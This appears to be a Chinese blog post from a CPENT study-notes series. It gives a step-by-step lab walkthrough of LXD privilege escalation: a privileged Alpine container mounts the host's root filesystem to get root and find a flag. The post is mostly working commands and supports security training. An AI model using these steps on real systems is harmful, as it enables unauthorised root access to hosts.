iT邦幫忙

2023 iThome 鐵人賽

DAY 13
0
Security

滲透測試小白的 CPENT 證照學習筆記系列 第 13

Lxd Privilege Escalation 提權

  • 分享至 

  • xImage
  •  

LXD 特權升級(LXD Privilege Escalation)指的是一種攻擊方法,其中攻擊者試圖通過某種方式提升他們在 LXD(Linux Container Daemon)中運行的容器的權限,以獲得對主機系統的更多控制權。

  • 在自己的電腦,建立最新的 Alpine image
    git clone  https://github.com/saghul/lxd-alpine-builder.git
    cd lxd-alpine-builder
    ./build-alpine
    image.png
    image.png

  • 將使用 alpine-v3.13-x86_64-20210218_0139.tar.gz 映像檔
    image.png

  • 進入靶機中
    cd /tmp

  • 將製作好的映像檔,透過 ssh 傳到靶機上。
    scp ./alpine-v3.13-x86_64-20210218_0139.tar.gz jason@192.168.2.10:/home/jason/alpine-v3.13-x86_64-20210218_0139.tar.gz

  • 將 image 掛上,取別名為 myimage
    lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage  //掛 image
    image.png

  • 作列舉,確認 image 有掛上去
    lxc image list 
    image.png

  • 這時候還沒有 root 權限
    id 
    image.png

  • 初始化 image。第一個yes,後面一直按預設的選項即可
    lxd init 

  • 掛上image
    lxc init myimage ignite -c security.privileged=true 
    image.png

  • 在 LXD 容器配置中添加一個設備的命令,將容器(叫 ignite)的根,掛到靶機的 /mnt/root。
    lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
    image.png

  • 將 ignite 容器啟動
    lxc start ignite

  • 進入容器的命令行環境。
    lxc exec ignite /bin/sh

  • 即取得容器的 root 權限。

  • id  
    image.png

  • 如此就可以用 容器的 root 權限到我們所掛載的 /mnt/root 靶機中暢通無阻找檔案了。

  cd /
  find -name flag.txt

上一篇
ProxyChains 實現應用代理
下一篇
WPScan - Wordprees 的剋星
系列文
滲透測試小白的 CPENT 證照學習筆記30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言